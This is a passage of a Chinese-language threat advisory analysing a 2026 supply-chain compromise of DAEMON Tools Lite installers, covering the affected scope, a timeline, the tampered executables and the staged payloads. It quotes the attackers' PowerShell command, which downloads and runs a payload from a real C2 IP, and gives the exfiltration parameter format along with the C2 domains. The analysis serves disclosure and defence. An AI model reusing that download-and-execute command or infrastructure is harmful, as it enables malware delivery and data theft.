normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围与风险分析</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">卡巴斯基遥测数据显示，自2026年4月8日起，观察到数千次感染，100多个国家/地区的个人和机构受影响。受害者主要分布在俄罗斯、巴西、土耳其、西班牙、德国、法国、意大利和中国。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">其中约10%为企业/组织机构，仅约12台机器部署了后续复杂载荷，涉及零售、科学、政府和制造行业（位于俄罗斯、白俄罗斯和泰国）。攻击意图目前不明确。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041839" src="https://wechat2rss.xlab.app/img-proxy/?k=bbae71de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTpqdv3gcHa75cjOtjEVaic66XABv1tRibiaXu4YBvK8icuE9SxByleZYkTOfWeg1cQyIRWBh4jRl71zlKAMrhbRq9VicFc7UWJGHEs%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">受影响场景</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">主要影响在 Windows 环境下使用 Daemon Tools 进行 ISO 镜像管理、游戏挂载或系统镜像制作的个人及企业用户。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">高危场景：</span> 开启了自动更新功能的用户，或在近期从官网下载并执行了安装程序的开发者与运维人员。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">特征：</span> 恶意代码在安装过程中静默运行，用户界面无任何异常提示，极具欺骗性。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041842" src="https://wechat2rss.xlab.app/img-proxy/?k=db8a805b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRhpNzZIibOSicSZdS98iboaxQjlNSQ5L8RbNFgRkF098hlYl6ymgO9IXybEDRrm9nJrxKyJnOsDDwRmb3D71qntpW13DJKL2GBNo%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击时间线</span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><table style="border-collapse:collapse;width:851px;border:none;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr style="height:27.8000pt;"><td data-colwidth="240" width="240" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;background:rgb(230, 231, 232);"><p style="text-indent: 21pt;text-align: center;"><b style=""><span style=""><font face="仿宋_GB2312"><span leaf="">时间</span></font></span></b></p></td><td data-colwidth="611" width="611" valign="center" style="padding:0pt 5.4pt;border-width:1pt 1pt 1pt medium;border-style:solid solid solid none;border-color:#d6d6d6;background:rgb(230, 231, 232);"><p style="text-indent:21.0000pt;mso-char-indent-count:0.0000;text-align:left;"><b style="mso-bidi-font-weight:normal;"><span style=""><font face="仿宋_GB2312"><span leaf="">事件详细说明</span></font></span></b></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="240" width="240" valign="top"><p style="text-align: center;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">2026</span><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">年</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">3</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">月</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">27</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">日</span></font></p></td><td data-colwidth="611" width="611" valign="top"><p style="text-align: left;"><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">攻击者注册仿</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">冒</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">C2</span><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">域名（</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">env-check.daemontools[.]cc</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">）</span></font></p></td></tr><tr style="height:56.7000pt;"><td data-colwidth="240" width="240" valign="top"><p style="text-align: center;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">2026</span><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">年</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">4</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">月</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">8</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">日</span></font></p></td><td data-colwidth="611" width="611" valign="top"><p style="text-align: left;"><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">首批投毒安装包开始通过官网分发（版本</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">12.5.0.2421</span><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">）</span></font></p></td></tr><tr style="height:55.4500pt;"><td data-colwidth="240" width="240" valign="top"><p style="text-align: center;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">2026</span><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">年</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">4</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">月</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">8</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">日起</span></font></p></td><td data-colwidth="611" width="611" valign="top"><p style="text-align: left;"><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">数千次感染开始发生，攻击者收集受害者信息</span></font></p></td></tr><tr style="height:55.4500pt;"><td data-colwidth="240" width="240" valign="top"><p style="text-align: center;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">2026</span><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">年</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">4</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">月</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">—5</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">月初</span></font></p></td><td data-colwidth="611" width="611" valign="top"><p style="text-align: left;"><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">攻击者对约</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">12</span><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">台高价值目标机器手动部署二阶段后门</span></font></p></td></tr></tbody></table></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">技术特征与攻击行为分析</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次攻击采用三阶段精心设计的攻击链，实现「广撒网→精准筛选→定向打击」的完整闭环，攻击者篡改了 DAEMON Tools 安装目录（默认路径：C:\Program Files\DAEMON Tools Lite）中的三个核心可执行文件，恶意代码被注入至 C 运行时库初始化代码（CRT init code）中，在程序启动时自动激活，在独立线程中运行后门逻辑，对用户完全透明，不影响软件正常功能。</span></p><table style="border-collapse:collapse;width:99.9600%;border:none;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr style="height:16.2500pt;"><td data-colwidth="312" width="312" valign="top" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;background:rgb(230, 231, 232);"><p style="text-indent: 21pt;text-align: center;"><b style=""><span style=""><font face="仿宋_GB2312"><span leaf="">篡改文件</span></font></span></b></p></td><td data-colwidth="539" width="539" valign="top" style="padding:0pt 5.4pt;border-width:1pt 1pt 1pt medium;border-style:solid solid solid none;border-color:#d6d6d6;background:rgb(230, 231, 232);"><p style="text-indent: 21pt;text-align: center;"><b style=""><span style=""><font face="仿宋_GB2312"><span leaf="">篡改始功能说明</span></font></span></b></p></td></tr><tr style="height:42.8000pt;"><td data-colwidth="312" width="312" valign="top" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;"><span style=""><font face="Times New Roman"><span leaf="">DTHelper.exe</span></font></span></p></td><td data-colwidth="539" width="539" valign="top" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p><span style=""><font face="Times New Roman"><span leaf="">DAEMON Tools </span></font><font face="仿宋_GB2312"><span leaf="">主辅助程序，负责核心虚拟驱动功能</span></font></span></p></td></tr><tr style="height:56.7000pt;"><td data-colwidth="312" width="312" valign="top" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;"><span style=""><font face="Times New Roman"><span leaf="">DiscSoftBusServiceLite.exe</span></font></span></p></td><td data-colwidth="539" width="539" valign="top" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p><span style=""><font face="仿宋_GB2312"><span leaf="">系统服务组件，开机自动启动，常驻后台</span></font></span></p></td></tr><tr style="height:55.4500pt;"><td data-colwidth="312" width="312" valign="top" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align: center;"><span style=""><font face="Times New Roman"><span leaf="">D</span><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;">TShell</span><span leaf="">Hlp.exe</span></font></span></p></td><td data-colwidth="539" width="539" valign="top" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p><span style=""><font face="Times New Roman"><span leaf="">Shell</span></font><font face="仿宋_GB2312"><span leaf="">扩展辅助程序，集成右键菜单等系统功能</span></font></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">被篡改的程序在启动时会向 C2 服务器发送 GET 请求，URL格式如下：</span></p><table><tbody><tr><td data-colwidth="576"><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://env-check.daemontools[.]cc/2032716822411?s=" target="_blank">https://env-check.daemontools[.]cc/2032716822411?s=</a>&lt;计算机全名&gt;</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该域名于2026年3月27日注册（攻击前约11天），为合法域名 daemon-tools[.]cc 的 Typo-squatting 仿冒。</span></p></div></div></td></tr></tbody></table></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041844" src="https://wechat2rss.xlab.app/img-proxy/?k=0624cd14&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTg8dUA4f6UUHGPs7OgUtqt5fFib5aXajnVGZPWjOibqtMZFVIZhY3PuUB6ibN0ryiavIhk9btUM2ZZibrcAwmQIia26aYff3z4Dvky8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">初始信息收集（envchk.exe）</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这是部署至几乎所有感染机器的第一阶段载荷，为一个 .NET 可执行文件（SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4），功能包括：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">•收集系统MAC地址、主机名、DNS域名</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">•枚举正在运行的进程列表</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">•收集已安装软件列表</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">•获取系统语言/区域设置（Locale）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">•将所有数据外泄至 C2 服务器：<a href="http://38.180.107[.]76" target="_blank">http://38.180.107[.]76</a></span></p><p style="word-break: break-all;" data-pm-slice="0 0 []"><span leaf="">部署方式：C2 服务器返回以下格式的 PowerShell 命令执行下载和运行：</span></p><table><tbody><tr><td data-colwidth="576"><p style="word-break: break-all;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;word-break: break-all;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">cmd.exe /c powershell -NoProfile -Command &#34;$wc=New-Object System.Net.WebClient;$wc.DownloadFile(&#39;<a href="http://38.180.107.76/env_check_script" target="_blank">http://38.180.107.76/env_check_script</a>&#39;,&#39;C:\Windows\Temp\envchk.exe&#39;)&#34;&amp;&amp;C:\Windows\Temp\envchk.exe <a href="http://38.180.107.76/09505aca4f538bd&amp;&amp;del" target="_blank">http://38.180.107.76/09505aca4f538bd&amp;&amp;del</a> %TEMP%\envchk.exe</span></p></td></tr></tbody></table><p style="word-break: break-all;"><span leaf="">数据外泄格式：POST 请求体包含以下参数：</span></p><table><tbody><tr><td data-colwidth="576"><p style="word-break: break-all;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;word-break: break-all;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">a=&lt;MAC地址&gt;&amp;b=&lt;主机名&gt;&amp;c=&lt;DNS域名&gt;&amp;d=&lt;进程列表&gt;&amp;e=&lt;已安装软件&gt;&amp;f=&lt;区域设置&gt;</span></p></td></tr></tbody></table><p style="word-break: break-all;"><span leaf="">攻击者利用这些信息对受害者进行精准画像，从数千台感染机器中筛选出真正有价值的目标。代码中包含中文字符串。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041843" src="https://wechat2rss.xlab.app/img-proxy/?k=bdc8419e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTQM1LiaxfKDF2sHkprRLT1Cs4jtpg0ldibdLLxLPKHPcdxXDw8BXyiaDA1A7vheXFCMVqbvB5UvJUBuIoq7VNQWmbMerK1e2dZuU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">轻量后门（cdg.exe）</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">仅部署至约12台经过筛选的高价值目标机器，为RC4加密的shellcode加载器，具备以下能力：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">下载并执行额外恶意载荷</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">执行任意 shell 命令（通过cmd.exe）</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在内存中直接运行shellcode（无文件落地）</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过POST请求向</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="http://38.180.107[.]76/79437f5edda13f9c066/version/check" target="_blank">http://38.180.107[.]76/79437f5edda13f9c066/version/check</a> 发送心跳包</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">部署方式：</span></p><table><tbody><tr><td data-colwidth="576"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);&#34;,&#34;data-pm-slice&#34;:&#34;0 0 